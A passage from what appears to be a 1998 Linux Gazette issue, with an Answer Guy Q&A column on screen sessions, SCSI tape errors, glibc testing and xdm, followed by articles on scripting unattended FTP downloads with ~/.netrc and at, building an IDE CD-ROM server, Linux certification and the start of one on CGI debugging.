You can also run the 'screen' utility, which, among many other features, allows you to open multiple screen sessions through one virtual console, telnet, xterm, or even dial-up VT100 sessions and dumb terminals. Think of having all the power of your virtual consoles from any sort of terminal/shell session. You can do screen snapshots, open and close log files, view a backscroll buffer (with 'vi' like search features), mark and paste text (keyboard driven), do a screen lock, and even detach the whole screen session from your current terminal, xterm or whatever (and re-attach to it from any login, from that or any other terminal, later).
I routinely run 'screen' for all my sessions. When I log into one of my ISP shell accounts I prefer to run 'screen' at the far end because it will auto-detach if my modem disconnects me. So, I can redial, re-attach and resume my work. I can also dial into my home system, do a 'kill -HUP' on my screen process (actually a 'screen -d -R' will auto-locate, HUP, and re-attach all at once) and continue working on all ten of the interactive programs that I had running at the time.
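A condensed sketch of that dial-up routine (the session name is arbitrary):

screen -S work          # at the far end: start a named session
#  ...the modem drops the line; screen auto-detaches...
screen -d -R work       # after redialing: detach the session from the dead
                        # terminal (if necessary) and re-attach it here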
There are other ways you can do this. There was a sample script in 'expect' that did this in about 10 lines of TCL/expect code.
You can also use Kermit (ckermit, from Columbia University). This is a communications package, file transfer package and network client. I wrote an article for SysAdmin Magazine about a year ago to describe its use as a telnet/rlogin client.
In addition to being fully scriptable and supporting the same file transfers over TCP/IP as it does over any serial connection, Kermit also lets you do logging and extensive debugging.
The next version (currently still in beta?) should support Kerberos authentication and encryption (one of several enhancements that I beat up on Frank da Cruz --- its principal author and co-ordinator --- about while researching my article).
So, there's about four options off the top of my head.

(?)Finding Soundcard Support

From Nathan Balakrishnan on 23 Oct 1998

Hello,

Do you know whether the YAMAHA OPL3-SAx WDM soundcard is directly supported by Red Hat 5.0, and how would I go about setting it up under Linux if it isn't?

NATHAN

(!)The best source of information on this subject is probably the "The Linux Sound HOWTO" (http://www.ssc.com/linux/LDP/HOWTO/Sound-HOWTO.html) by Jeff Tranter <>.
I think most of the kernel sound support was originally donated by Hannu Savolainen <> of 4 Front Technology (http://www.4Front-Tech.com/oss.html) which also sells their "Open Sound System" package (for about $20 US (presumably)).
The version that's included with Linux is known as OSS/Free while OSS/Linux is 4 Front's commercial version. They also support sound drivers on numerous other versions of Unix.
I guess there is an independent "Linux Ultra Sound Project" (http://home.pf.jcu.cz/~perex/ultra), also known as the "Advanced Linux Sound Architecture" (ALSA), which includes your model on their list of supported cards (http://alsa.jcu.cz/src/soundcards.html).
So, try reading those and see if that helps. I personally have almost never used any sound cards. My computers make enough noise with all those fans and disk drives.

(?)Problems with a SCSI Tape Drive

From Ralf Schiemann on 23 Oct 1998

Hi, I've a problem with backing up our file server (Linux 2.0.33). Attached to the server is a HP C1557A SCSI TapeLoader (6 x 24 GB). Actions on the loader are done without any problems (e.g. loading and unloading of tapes).

But if I try to do a backup via tar (tar cvf /dev/st0 /tmp) the tape display is telling me "Write" and after a short while "Tape Position lost". In /var/log/messages I find the following errors:

kernel: st0: Error with sense data: extra data not valid
Deferred error st09:00: sense key Medium Error
kernel: Additional sense indicates Sequential positioning error
kernel: st0: Error on write filemark.

Can you tell me what's going wrong?? Any help is welcome,
Ralf

(!)I would look at SCSI termination and cabling problems. It sounds like commands are getting through the interface just fine, and streams of data are causing the problem.
You don't say which SCSI adapter and drivers you're using. If this is a modular kernel, try compiling the appropriate SCSI driver directly into it (to eliminate any chance of anomalies with automatic loading and removal of the SCSI drivers by kerneld, etc).
Try compiling a very minimal kernel with just the drivers you need to do your backup. You want to see if there's some strange conflict between your drivers.
Finally you might try testing this with a different SCSI adapter, with no other peripherals on it, and the best cable you can buy. Is this an internal or external unit? (I'm guessing external, since DAT autochangers are pretty big for internal drive bays.)
If you can afford it, it's best to put your SCSI tape drive on a separate SCSI card (a fairly cheap $60 ISA card is fine). This allows you to take the tape drive off of that system without having to reboot, and it maximizes performance on the other bus.

(?)Test Suites for GNU and other Open Source (TM) Software

From Steve Snyder on 20 Sep 1998

Is there a validation test suite for glibc v2.0.x? I mean a more comprehensive set of tests than are run by "make check" after building the runtime libraries.

(!)Not that I know of. I guess the conventional wisdom is that if I install glibc and a bunch of sources, compile the sources against the library, and run all of the resulting programs --- failures will somehow be "obvious."
Personally I think that this is stupid. Obviously it mostly works for most of us most of the time. However, it would be nice to have full test and regression suites that exercise a large range of functions for each package --- and to include these (and the input and reference data sets) in the sources.
It would also be nice if every one of them included a "fuzz" script (calling the program with random combinations of available options, switches and inputs --- particularly with a list of the available options). This could test the programs for robustness in the face of errors and might even find some buffer overflows and other bugs.
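A toy version of such a fuzz script might look like this --- the default target and the iteration count are arbitrary, and a real harness would also randomize option strings from the program's documented switch list:

#!/bin/sh
# fuzz (sketch): throw random bytes at a program's stdin and watch for
# crash exits (an exit status above 128 means it died on a signal).
PROG=${1:-cat}                        # hypothetical default target
i=0
while [ $i -lt 100 ] ; do
        head -c 512 /dev/urandom > /tmp/fuzz.$$
        "$PROG" < /tmp/fuzz.$$ > /dev/null 2>&1
        RC=$?
        if [ $RC -gt 128 ] ; then
                echo "crash: signal `expr $RC - 128` on iteration $i"
        fi
        i=`expr $i + 1`
done
rm -f /tmp/fuzz.$$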
However, I'm not a programmer. I used to do some quality assurance --- and that whole segment of the market seems to be in a sad state. I learned (when I studied programming) that the documentation and the test suite should be developed as part of the project. User and programmer documentation should lead the coding (with QA cycles and user reviews of the proposed user interfaces, command sets, etc., prior to coding).
The "whitebox" test suites should be developed incrementally as parts of the code are delivered (if I write a function that will be used in the project, some QA whiteboxer should write a small specialized program that calls this function with a range of valid and invalid inputs and tests the function's behaviour against a suite that just applies to it).
Recently I decided that md5sum really needs an option to read filenames from stdin. I want to write some scripts that essentially do:
'find .... -print0 | md5sum -0f '
... kind of like 'cpio'. Actually I really want to do:
'rpm -qal | regular.files | md5sum -f'
... to generate some relatively large checksum files for later use with the '-c' option. This 'rpm' command will "Query All packages for a List of all files." The regular.files filter is just a short shell script that does:
#!/bin/sh
## This uses the test command to filter out filenames that
## refer to anything other than regular files (directories, 
## Unix domain sockets, device nodes, FIFO/named pipes, etc) 
while IFS= read -r i ; do   # -r keeps backslashes in filenames intact
        [ -f "$i" ] && echo "$i"
done
So I grabbed the textutils sources, created a few sets of md5sum files from my local files (using 'xargs'). Those are my test data sets.
Then I got into md5sum.c, added the command options, cut and pasted some parts of the existing functions into a new function, and was able to get it cleanly compiling in a couple hours. I said I'm not a programmer, didn't I? I think a decent programmer could have done this in about an hour.
Then I ran several tests. I ran the "make check" tests, and used the new version's -c to check my test sets. I then used the same script that generated those to generate a new set using the new version/binary. I then compared those (using 'cmp' and 'diff') and checked them with the old version. Then I generated new ones (with the new switch I'd added, and again with the old version) and cross-checked them again.
This new version allows you to use stdin or pass a filename which contains a list of files to checksum --- it uses the --filelist long argument as well as the -f short form; and you can use -f - or just -f to use stdin. I didn't implement the -0 (--null) option --- but I did put in the placeholders in the code where it could be done.
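So the workflow the patch enables looks like this (paths are hypothetical, and the '-f' switch is from my patch, not anything in the stock textutils):

# build a checksum database of every regular file owned by any package
rpm -qal | regular.files | ./md5sum -f - > /var/tmp/md5.all
# ...and verify the system against it later
./md5sum -c /var/tmp/md5.all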
The point here is that I had a test suite that was longer than the code. I also spent more time testing and documenting (writing a note to Ulrich Drepper, the original author of this package to offer the patches to him) than I did on coding.

(?)Though a benchmarking component would be nice, my main concern is to verify that all (or at least the vast majority) of the library functions work correctly. What I want to know is, given a specific compiler and a specific version of glibc source files, how can I verify that the libraries built are reliable?

(!)By testing them. Unfortunately, that may mean that you'll have to write your own test suites. You may have to start a GNU/new project to create test suites.
It is likely that most of the developers and maintainers of these packages have test suites that they run before they post their new versions. It would be nice if they posted the test suites as part of the source package --- and opened the testing part of the project to the open development model.
In addition, these test suites and harnesses (the scripts to create isolated and sample directory structures, etc., to run a program (or library) through its paces) would serve as a great addition to the documentation.
I find 'man' pages to be incredibly dense. They are fine if you know enough about the package that you are just looking for a specific feature that you think might be there, or one that you know is in there somewhere --- but you don't remember the switch or the syntax. However, a test harness, script, and set of associated inputs, outputs, and configuration files would give plenty of examples of how the bloody thing is supposed to work. I often have to hunt for examples --- this would help.

(?)The specific version I want to test is the glibc v2.0.7 that comes with RH Linux v5.1 and updated after 5.1 release by package glibc-2.0.7-19.src.rpm. I think that such a testsuite, though, if it exists, would be applicable to any platform.

(!)I agree. I just wish I could really co-ordinate such a project. I think this is another example where our academic communities could really help. Before, I've said that I would like to see an "adopt a 'man' page" project --- where college and university professors, and even high school teachers, from around the world assign a job to their students:
Find a command or package for Linux, FreeBSD, etc. Read the man pages and other docs. Find one way that the command is used or useful that is not listed in the "examples" section of that man page. Write a canonical example of that command variant.
... they would get graded on their work --- and any A's would be encouraged (solely at their option) to submit the recommended example as a patch to the maintainer of the package.
Similar assignments would be given for system calls, library functions, etc. (as appropriate to the various classes and class segments).
Along with this, we could have a process by which students are encouraged to find bugs in existing real world software --- write test suites and scripts to test for the recurrence of these bugs in future versions (regressions), and submit the tests to that package's maintainer.
The problem with all of this is that testing is not glamorous. It is boring for most people. Everyone knows Richard M. Stallman's and Linus Torvalds' names --- but fewer people remember the names of the other programmers that they work with, and no one knows who contributed "just the testing."
There are methods that can be used to detect many bugs more quickly and reliably than by waiting until users "bump into" them. These won't be comprehensive. They won't catch "all" of the bugs. However, people will still "bump into" enough bugs in normal usage, even if we employ the best principles of QA practice across the board.
Unfortunately I don't have the time to really devote to such a project. I devote most of my "free" time to the tech support department. I do have spare machine cycles, and could gladly devote time to running these tests and reporting results. Obviously some tests require whole networks, preferably disconnected ones, on which to run safely. Setting up such test beds, and designing tests that return meaningful results, is difficult work.
I personally think that good test harnesses are often harder to design than the programs that they are designed to test.

(?)Thank you.
***** Steve Snyder *****


(?)All that Vaunted Support for those Windows Users

From prince20 on 14 Sep 1998

Hi

My Favorites Folder was converted to a shell file after I reinstalled Windows95 and Internet Explorer 4.01SP.

(!)What is a "shell file"?

(?)Yeah you guessed it I did not back up the folder. The problem I have is that I can not open the shell file. I have used every method I know but nothing is happening.

Do you know of a tool or a way to open the shell file? Please Email me. Your help is appreciated.

(!)I'd look at it in 'vi' if it was on my system. However, that probably isn't very helpful.

(?)Thank You

(!)Where did you get this address and why did you mail this question to me? I volunteer time to answer Linux questions. I don't run Win 95. Microsoft and other commercial software companies are supposed to have their own tech support departments. If those sources of support are failing you --- perhaps you should reconsider your software purchases.

(?)Another Non-Linux Question

From [email protected] on 08 Oct 1998

I have been trying to connect my brother's PC in Louisville with mine in Atlanta, using his Win95 dial-up as a client and mine as an NT 4.0 RAS server.

(!)I'm the "Linux Gazette Answer Guy" --- call Microsoft's tech support with our questions about their OS.
If you'd like to try Linux at either end of this connection --- be sure to look through some of our HOWTO's and guides at: http://sunsite.unc.edu/LDP (Linux Documentation Project).

(?)We have tried with different protocols, and our workgroups, user names and p/words matching but with no success.

He can dial from Win95, but mine does not respond at all. So I suspect my modem, which is not listed in Microsoft's HCL; it is a CPI Viva 33.6 CommCenter. I know for sure that my modem could not automatically answer the call under NT 4.0, because when I set up my server as a Win95 dial-up server the modem answered and we made the connection. I even tried to edit the modem log for my modem type in case it works, but I didn't know how to edit the log.

Is there any method you can think of how to solve this problem. I want to use my nt4.0 RAS to connect to Win95 Dial-Up client. Please help me.

(!)I want to stop getting questions for some OS that I don't run, a derivative of one that I abandoned a half decade ago. Please help me. Call Microsoft (or hire an MCSE, or try your modem vendor).

(?)Thank you. Zeki

[ All of you folks interested in MS-Windows rather than the Linux environment might find http://www.fixwindows.com/ handy; it's run by MCSE's, so I suppose in a worst case, you know where to hire someone. But before you go that far, they have a vendor phone listing, and some hints for effective troubleshooting. There's also a newsgroup hierarchy for your environment.

If you are considering switching and you like experimenting, you might help out the WINE Project at http://www.winehq.com/, run a copy of WinOS/2 under Dosemu (http://www.suse.com/dosemu/), or try any of the growing number of major applications available in both environments. -- Heather ]


(?)Macro Virus?

From [email protected] on 14 Oct 1998

Hello, Answerguy,

I found you on the web. Your name simply dictates that I must ask you a question:

A user has a Dell Laptop running Windows 95, Office97, and Outlook 98. Apparently, he has acquired some sort of virus (I'm assuming here) because when he opens Outlook 98 (Exchange 5.5) and sends an email (replies or writes a new message) three windows automatically open and the cursor continuously types a character until he hits the spacebar. This happens when he opens a Word document and an Excel document, too.

(!)You only know part of the story. My full "name" is "The Linux Gazette Answer Guy" (tag).
So, I answer LINUX questions.
However....

(?)Background:

I've run McAfee 3.2 (with latest DAT files) and found no trace of viruses (clean boot, et al.). This laptop was sent back to Dell and they (supposedly) Fdisked it and reinstalled the OS. Worked for a while, but IT'S BAAAACK. Definitely sounds like some sort of file infection, but I'm at my wit's end. I've scanned all files on the network and found one macro-virus-infected file (cleaned).

Any information or insight that you can provide would be welcome.

Thanks for your time, AG.

Gary Hollifield
MIS Manager
FOCUS Enhancements, Inc.

NOTE: Please reply to all (I would like to get this at work, too). Thanks again.

(!)As it happens I used to work for McAfee (as a Unix sysadmin, and their BBS SysOp). I also did some QA on SCAN.
While the behaviour you describe is suspicious, we can't definitely say that it is a virus solely from the symptoms you describe.
I would wipe the system personally (don't send it off to the chop shop, do it yourself). Leave it completely off of the network for a few days (at least twice as long as it seemed to take for the problem to appear on the previous occasions).
Install all software, OS, Office, etc. from the original CD's. Manually disable the "boot from floppy" options in the CMOS setup and the "autoexecute macro" features from WinWord and Excel. Manually inspect all documents that go onto the system (and limit yourself to short documents).
It could be some strange compatibility problem. If you don't see this happening on any other systems in your network with which this system has been sharing files, floppies and users, then it's not a virus (it's not spreading!).
Other than that, I'd consider putting Linux on it, and running that. Although there has been one "virus" for Linux (Bliss, a piece of sample code that actually managed to honestly infect a couple of users), they are simply not a problem for Linux, FreeBSD, or other Unix users.

(?)Remote X using xdm

From Andy Faulkner on 28 Sep 1998

Dear answerguy.

I have been trying for the last several hours to do something that sounded simple when I first started.

I am trying to launch an xdm session on my Linux box from another Linux box on the same network.

I have tried to use "chooser" but it brings up no listed hosts. Also when I fire up chooser I see nothing going across the network. I hate to say this, but with my Winblows box I can do it with ReflectionX. I am running S.u.S.E. 5.2 and the other machine is running 5.3. We are both using KDE and also using kdm instead of xdm. We have tried both, and both had the same results. It looks as though I am not sending the request out to the host for an xdm session.

I can't seem to find any docs on "chooser" or on how to launch a session on a Linux box.

What do you think? Andy Faulkner

I think 'chooser' (/usr/X11R6/lib/X11/xdm/chooser) is normally run by 'xdm' --- probably with some special environment variables and parameters --- so I don't think it's feasible to run 'chooser' by itself. (That would be a good reason to put it in the "lib" directory rather than under a bin directory --- and would explain why it has no man page of its own.)
(I'll grant that this seems like an odd way to do it --- since making 'chooser' a shared library would make more sense from a classical programming point of view. In any event, I don't know how you'd use 'chooser' directly.)
Remote execution of X sessions via xdm is a bit confusing. Under S.u.S.E. they have a script /sbin/init.d/rx which can be used with their /etc/rc.config variable settings to run the xdm and allow access via XDMCP (the X display manager control protocol).
To remotely access systems running these display managers you have to run your X server with a command such as:
X -broadcast
(connect to the "first" --- or only --- available xdm server).
Alternatively you can specify the server you want to connect to with a command like:
X -query $HOST
--- which will require the host name or IP address.
To use the chooser you have to run a command like:
X -indirect $HOST
... this will cause the xdm on the named host to provide a list of known xdm hosts (possibly including itself).
In any of these cases the 'xdm' process must already be running on the remote host. That host need not be running any X server! (I realize the terminology is confusing --- more on that later).
To quote the xdm man page:
When xdm receives an Indirect query via XDMCP, it can run a chooser process to perform an XDMCP BroadcastQuery (or an XDMCP Query to specified hosts) on behalf of the display and offer a menu of possible hosts that offer XDMCP display management. This feature is useful with X terminals that do not offer a host menu themselves.
(it's also possible to configure the list manually and to configure it so that some BroadcastQuery replies are ignored).
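That manual configuration lives in xdm's Xaccess file (in the same /usr/X11R6/lib/X11/xdm directory as the scripts mentioned below). As a minimal sketch, assuming a stock X11R6 layout, a pair of entries like these allows any host to get a login window and answers indirect queries with a chooser built from broadcast replies:

#  /usr/X11R6/lib/X11/xdm/Xaccess (sketch)
*                      # any host may request a direct login
*  CHOOSER BROADCAST   # indirect queries get a chooser built from broadcast replies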
I have no idea whether 'kdm' incorporates all of these functions or not. You should look through its man page for details.
I'm also a bit unclear on how you'd run xdm such that it would not run a local display server. I know it's possible, but I'm not sure how. (In other words, if you want to run 'kdm' on your console and 'xdm' for the remote X servers).
I realize the terminology is a bit confusing here. We have "xdm servers" running on one machine, and X servers (the X Window System display server --- the thing that actually controls your video card) running on other machines. Note that the X display server controls your video card and acts as a communications package between your display (keyboard, video, and mouse) and the programs that are running under X (the "clients" to your display server).
Thus 'xdm' is a "client" to your X display server regardless of whether that 'xdm' process is running on your localhost or on another machine on the network.
To complicate issues even further, the 'xdm' "indirect" option first connects your X server to one client --- then, based on the selection you make from the chooser, it restarts your X server with instructions on connecting to another 'xdm' host.
In the end, when you connect to a host via 'xdm', you log in, and it is as though you were running an X session at that system's console. All of the windows you open will be processes running on the 'xdm' host. So you can think of 'xdm' as a combined 'getty', 'telnetd', and 'login' for the X protocol.
There are a variety of shell scripts under /usr/X11R6/lib/X11/xdm that control how the console is "taken" (back from a user that logs out), "given" (to a user that logs in), "setup" (prior to xdm's display of the "xlogin" widget), "started" (as 'root' but after login), and how the "session" is started (under the user's UID).
You'll want to read the xdm man page and all of the scripts and resource files in the xdm directory to adjust these things. (It just amazes me how complicated all that vaunted "flexibility" and all those customization options can make something as seemingly simple as: provide me with a GUI login).
Anyway, I hope that helps.

"Linux Gazette...making Linux just a little more fun!"


Building an Automatic FTP Retriever

by Manuel Arturo Izquierdo


The Internet is a big, wide world of information, which is really great; but when one works over a limited Internet connection, retrieving big amounts of data may become a nightmare. This is my particular case. I work at the National Astronomic Observatory, Universidad Nacional de Colombia. Its ethernet LAN is attached to the university's main ATM network backbone. However, the external connection to the world goes through a 64K bandwidth channel, and that's a real problem when more than 500 users surf the net in the daytime, for Internet speed becomes offensively slow. Matters change when night comes and there is nobody at the campus, and the transmission rate grows to acceptable levels. Then one can easily download big quantities of information (for example, a whole Linux distribution). But as we are mortal human beings, it's not very advisable to stay awake all night working at the computer. So a solution arises: program the computer so it works while we sleep. Now the question is: how do you program a Linux box to do that? This is the reason I wrote this article.

In this article I cover what concerns ftp connections. I have not yet worked on http connections; if you have done so, please tell me.

At first sight, a solution comes up intuitively: use the at command to schedule an action at a given time. Let's recall what a simple ftp session looks like (the commands entered by the user are shown in bold):

bash$ ftp anyserver.anywhere.net
Connected to anyserver.anywhere.net.
220 anyserver FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) 
ready.
Name (anyserver:theuser): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:(an e-mail address)
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
ftp> bin
ftp> get anyfile.tar.gz
150 Opening BINARY mode data connection for anyfile.tar.gz (3217 bytes).
226 Transfer complete.
3217 bytes received in 0.0402 secs (78 Kbytes/sec)
ftp> bye
221 Goodbye.
bash$ 

You can write a small shell script containing the steps that at will execute. To feed the internal ftp commands from a shell script you can use a shell syntax feature that permits embedding data, which would supposedly come from the standard input, directly into the script. This is called a "here" document:

#! /bin/sh
echo This will use a "here" document to embed ftp commands in this script
# Begin of "here" document
ftp <<**
open anyserver.anywhere.net
anonymous
[email protected]
cd pub
bin
get anyfile.tar.gz
bye
**
# End of "here" document
echo ftp transfer ended.

Note that all the data between the ** strings is sent to the ftp program as if it had been typed by the user. So this script would open an ftp connection to anyserver.anywhere.net, log in as anonymous with [email protected] as the password, and retrieve the file anyfile.tar.gz located in the pub directory using binary transfer mode. In theory this script looks okay, but in practice it won't work. Why? Because the ftp program does not accept the username and password via a "here" document; in this case ftp will react with an "Invalid command" to anonymous and [email protected]. Obviously the ftp server will reject the connection when no login and password data are sent.

The trick lies in a hidden file used by ftp called ~/.netrc, which must be located in your home directory. This file contains the information required by ftp to log into a system, organized in three text lines:

machine  anyserver.anywhere.net
login    anonymous
password [email protected]

In the case of private ftp connections, the password field must contain the corresponding account password, instead of an email address as for anonymous ftp. This may open a security hole, so ftp requires that the ~/.netrc file lack read, write, and execute permissions for everybody except the user. This is done easily using the chmod command:

chmod go-rwx .netrc
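A quick listing should then show that only the owner retains access (the user name, size, and date below are just an example):

bash$ ls -l ~/.netrc
-rw-------   1 theuser  users          68 Nov  1 03:00 /home/theuser/.netrc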

Now our shell script will look like this:

#! /bin/sh
echo This will use a "here" document to embed ftp commands in this script
# Begin of "here" document
ftp <<**
open anyserver.anywhere.net
cd pub
bin
get anyfile.tar.gz
bye
**
# End of "here" document
echo ftp transfer ended.

ftp will extract the login and password information from ~/.netrc and will make the connection. Say we called this script getdata (and made it executable with chmod ugo+x getdata); we can schedule its execution at a given time like so:

bash$ at 1:00 am
getdata
(control-D)
Job 70 will be executed using /bin/sh
bash$

When you return in the morning, the requested data will be on your computer!
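Since at also reads the job from its standard input, the scheduling itself can be scripted; this one-liner should be equivalent (assuming getdata is in your PATH):

bash$ echo getdata | at 1:00 am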

Another useful way to use this script is:

bash$ nohup getdata &
[2] 131
bash$ nohup: appending output to 'nohup.out'
bash$ 

nohup lets the process it executes (in this case getdata) keep running in spite of the user logging out. So you can work on anything else while a set of files is retrieved in the background, or log out without killing the ftp child process.

In short, you may follow these steps:

1. Create a ~/.netrc file with the machine, login, and password lines for the server, and chmod it so that only you can read it.
2. Write a small shell script (like getdata above) that feeds ftp its commands through a "here" document, and make it executable.
3. Schedule the script with at (or launch it in the background with nohup).

And voilà.

Additionally, you can add more features to the script, so it automatically manages the updating of the ~/.netrc file and generates a log file showing the time used:

#!/bin/sh

# Makes a backup of the old ~/.netrc file
cp $HOME/.netrc $HOME/netrc.bak

# Configures a new ~/.netrc
rm $HOME/.netrc
echo machine anyserver.anywhere.net > $HOME/.netrc
echo login anonymous >> $HOME/.netrc
echo password [email protected] >> $HOME/.netrc
chmod go-rwx $HOME/.netrc
echo scriptname log file > scriptname.log
echo Begin connection at: >> scriptname.log
date >> scriptname.log
ftp -i <<**
open anyserver.anywhere.net
bin
cd pub
get afile.tar.gz
get bfile.tar.gz

bye
**
echo End connection at: >> scriptname.log
date >> scriptname.log
# End of scriptname script

Creating such a script by hand each time we need to download data may be annoying. For this reason I have written a small tcl/tk8.0 application to generate a script tailored to our needs.

You can find detailed information about the ftp command set in its respective man page.



Copyright © 1998, Manuel Arturo Izquierdo
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Building an IDE CD-ROM Server

by Ron Jachim and Howard Cokl

of the Barbara Ann Karmanos Cancer Institute


Introduction

The advantages of having a CD-ROM jukebox should be readily apparent in a networked environment: you can provide multiple CD-ROMs to multiple people. Granted, in an ideal environment you would want the throughput of SCSI CD-ROM drives, but there are also disadvantages to SCSI drives: they are more expensive and harder to configure. A cheaper alternative is to use a bunch of IDE CD-ROM drives. Many people even have slower ones lying around because they just had to have a faster one.

What you need:

- A case big enough to hold all the drives (order it with a power supply)
- A motherboard, CPU, and memory
- A single IDE hard disk to boot from
- Up to seven ATAPI-compliant IDE CD-ROM drives
- One or two IDE controller cards, depending on how many channels the motherboard provides
- A network card

I assume that you can assemble all of the parts necessary. You may have to call around and ask about an appropriate case -- order it with a power supply, as they sometimes use unusual ones. JDR does not show one in their catalog, but we got ours from JDR. The most unusual component is the IDE controller, which we describe below, and it is not even that unusual.

IDE Controller Description

The only key to this server is that you can have up to four IDE channels, each capable of supporting two drives. The controller must be ATAPI compliant to support IDE CD-ROM drives. Assuming you use a single IDE hard disk for booting, that leaves up to seven connection points for additional IDE devices, in this case CD-ROM drives. An appropriate controller is the Enhanced IDE controller card, part number MCT-ILBA, from JDR Microdevices (www.jdr.com), which lists at $69.99.

Many motherboards are capable of supporting one or two IDE channels, so configuration instructions vary slightly. The rest of the discussion assumes you want a maximal configuration.


No Channels on the Motherboard (two IDE controller cards required)

Configure the first controller so that its first channel is the primary controller and the second channel is the secondary controller. The controller card should have a BIOS address and you will need to make sure it does not conflict with any other BIOS address ranges already in use (or on the other IDE controller card).

Configure the second controller so that its first channel is the tertiary (third) controller and the second channel is the quaternary (fourth) controller.

Note your IRQ and I/O Address range for all channels. Remember, you cannot share the IRQs, I/O address ranges, or BIOS address ranges.

1 Channel on Motherboard (two IDE controller cards required)

If the motherboard has one IDE channel, it will support two IDE drives. Configure the channel as primary. You probably have no choice in this, but if you do, choose primary.

Configure the first IDE controller card so that its first channel is the secondary controller and disable the second channel. The controller card should have a BIOS address and you will need to make sure it does not conflict with any other BIOS address ranges already in use (or on the other IDE controller card).

Configure the second IDE controller card so that its first channel is the tertiary controller and the second channel is the quaternary controller.

Note your IRQ and I/O Address range for all channels. Remember, you cannot share the IRQs, I/O address ranges, or BIOS address ranges.

2 Channels on Motherboard (one IDE controller card required)

If the motherboard has two IDE channels, it will support four IDE drives. Configure the first channel as the primary controller and the second channel as the secondary controller.

Configure the IDE controller card so that its first channel is the tertiary controller and the second channel is the quaternary controller. The controller card should have a BIOS address and you'll need to make sure it does not conflict with any other BIOS address ranges already in use (or on the other IDE controller card).

Note your IRQ and I/O Address range for all channels. Remember, you cannot share the IRQs, I/O address ranges, or BIOS address ranges.

Table of Common IDE Information

 #   Channel      IRQ   I/O Address*
 0   Primary      14    1F0-1F8
 1   Secondary    15    170-178
 2   Tertiary     11    1E8-1EF
 3   Quaternary   10    168-16F

* Note: the documentation with our card was incorrect.

Software Installation

Once you have configured the hardware and noted all settings, you are nearly done.

Start the Slackware installation with the bootdisk. A normal Linux installation has two IDE channels configured, so you only need to configure the other two channels. At the "boot:" prompt, specify the additional IDE channels using kernel "command line" options. For example,

boot: ide2=0x1e8,0x1ef,11 ide3=0x168,0x16f,10

As you can see, the third IDE channel (ide2) uses I/O addresses in the range 1E8-1EF and IRQ 11. The fourth IDE channel (ide3) uses I/O addresses in the range 168-16F and IRQ 10.
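If the server is going to reboot unattended, you will probably want these options made permanent instead of typed at every "boot:" prompt. With LILO, for example, an append line in /etc/lilo.conf should do it (a sketch only; remember to rerun lilo afterwards):

# fragment of /etc/lilo.conf
append = "ide2=0x1e8,0x1ef,11 ide3=0x168,0x16f,10"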

After completing the Slackware install, it is simply a matter of either exporting the drives for NFS mounting or configuring Samba and sharing the drives.
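As a sketch of the NFS route (the device names, mount points, and client host names here are examples only, and /etc/exports syntax varies between NFS implementations), each CD-ROM drive gets a mount point and an export entry:

# /etc/fstab -- one line per CD-ROM drive
/dev/hdc   /cdrom0   iso9660   ro,noauto   0 0
/dev/hdd   /cdrom1   iso9660   ro,noauto   0 0

# /etc/exports -- offer the mounted discs read-only to the clients
/cdrom0   client1(ro) client2(ro)
/cdrom1   client1(ro) client2(ro)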

Next Step

The next thing we would like to do is configure the CD-ROM server with 8 CD-ROM drives and no hard disk. We feel it is a technically elegant solution to have the boot disk be a custom-burned CD-ROM and to use BOOTP or DHCP to handle the network configuration. A possible alternative is to use a solid-state drive for boot purposes.


Copyright © 1998, Ron Jachim and Howard Cokl
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Creating a Linux Certification Program - The Next Step

By Dan York



After my article in the October Linux Gazette, I received over 60 replies, almost all of which were positive. With this next article, I want to announce various resources on the web and also a new mailing list to discuss certification. Many thanks to all of you who have sent me pointers and also volunteered to help. I received responses from all corners of the globe and was excited and impressed to see: a) the work some people are already doing on Linux training and certification; b) the enthusiasm out there about Linux, and also about Linux training and certification; and c) the willingness of so many people to help out and be involved!  THANK YOU!!

Initial Comments

Five specific notes before I get to all the pointers people have sent me:

Resources Relating To Linux Certification

As a result of my article, a number of people sent me pointers to resources available on the web relating to Linux training and certification.  The pointers are listed below.

Final Thoughts

Other people did point out that this topic has been around for a while. Indeed, through the AltaVista search engine I found pointers to discussions that occurred back in 1996 about setting up a Linux certification program.

The issue now is that the momentum of certification within the IT industry just keeps increasing, and the responses to my article make me only that much more sure that we need to move now to build a unified Linux certification program that we can all get behind and promote with the same energy and enthusiasm that Microsoft promotes the MCSE and Novell promotes the CNE.

The biggest single item that can kill a Linux certification program is if we in the Linux community wind up with 4 or 5 separate programs! (Do I hear the UNIX wars again?)  There is strength in numbers - can we build a common program?   Please join me on the mailing list and let's see if we can give it a shot!


Copyright © 1998, Dan York
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Debugging CGI Programs over TCP Sockets

by Kevin O'Malley


BACKGROUND

This article evolved from my frustration in developing and debugging CGI programs written for the AuctionBot, a multi-purpose auction server. I found that the available C libraries, C++ class libraries and web server extensions did not fit my needs so I decided to implement a different approach based on debugging over TCP sockets. Using this approach, I have successfully implemented and debugged most of the CGI's for this project.

My development machine at work is a Sun Ultra 1 running Solaris 2.5. At home I have a Linux box running RedHat 5.0. I developed all my debugging code under Linux. Linux provides a very stable development environment that allowed me to develop, test and experiment locally, without requiring remote login to the Sun. Once the code was running, I simply moved it over to the Sun, built it and started using it.

OVERVIEW

Debugging CGI (Common Gateway Interface) programs presents unique challenges not found when debugging programs in more traditional environments. CGI's are executed by a web server and run within the environment created by the web server. This makes a CGI's runtime behavior strongly coupled to the environment set up by the web server. A developer cannot simply run a CGI from a shell, or under a debugger, and expect it to behave as it does while running within the web server environment.

A common CGI debugging technique involves capturing the environment that a CGI is run under (usually to a disk file), restoring the environment on a local machine, and running the CGI locally within the restored environment. Using this technique, CGI's can be run from the command-line, or from within a debugger (gdb, for example), and debugged using familiar debugging techniques. This technique is straightforward, but requires the developer to perform the extra work of capturing and restoring the CGI runtime environment.
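As a minimal sketch of that capture step (the file names here are hypothetical), one could temporarily install a small shell script in place of the real CGI to record the environment the web server sets up:

#!/bin/sh
# stand-in CGI: save the server-supplied environment and any POST data
env > /tmp/cgi-env.$$
cat > /tmp/cgi-stdin.$$
echo "Content-type: text/plain"
echo
echo "environment captured"

The saved variables can then be re-exported in a local shell before running the real CGI under gdb.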

